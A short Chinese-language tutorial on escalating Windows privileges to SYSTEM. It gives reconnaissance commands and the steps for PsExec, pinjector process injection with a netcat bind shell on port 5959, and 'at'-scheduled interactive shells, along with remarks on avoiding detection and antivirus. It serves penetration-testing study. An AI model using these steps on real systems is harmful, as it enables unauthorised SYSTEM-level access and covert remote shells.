提权--windows

Windows权限

用户有三种：Users，Administrator，System
提权是将本地拥有administrator权限用户提权到system用户

windows基础提权命令

查看系统信息：systeminfo|findstr /B /C:”OS名称” /C:”OS版本”
主机名：hostname
环境变量：set
查看用户信息：net user
查看服务pid号：tasklist /svc | find “TermService”
查看端口：Netstat -ano | find “1488”

使用微软官方工具SysinternalsSuite提权

下载工具地址：[https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suite]
容易被排查，但是不会报毒

将psexec.exe放入到windows\system32下

执行命令，-i 交互式；-s远程执行

psExec.exe -i -s cmd

进程注入（pinjector.exe）提权

进程注入将pinjector注入到用户的进程里一起运行，进而同时拥有了对应的权限。
是一种比较隐蔽的手段，不会创建新的进程，很难发现，但是上传至目标主机时可能会报毒

从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。
放到主机的c盘根目录下

  Pinjector.exe -l 列出进程，列出的所有进程都可以利用（找system对应权限的进程）

 pinjector.exe -p 456 cmd 5959

然后查看到端口5959出于侦听状态，注入成功

Kali中使用nc工具

  nc -nv 192.168.3.83 5959

执行whoami命令，可以看到目前是system权限

Win 2003使用at命令提权

at命令 系统调度任务的指令,会调用system指令完成任务
指定一个时间，操作系统自动执行一个命令

  at 18:13 /interactive cmd   #18:13分执行一个交互式的cmd

如果尝试使用win7，使用at命令不允许交互式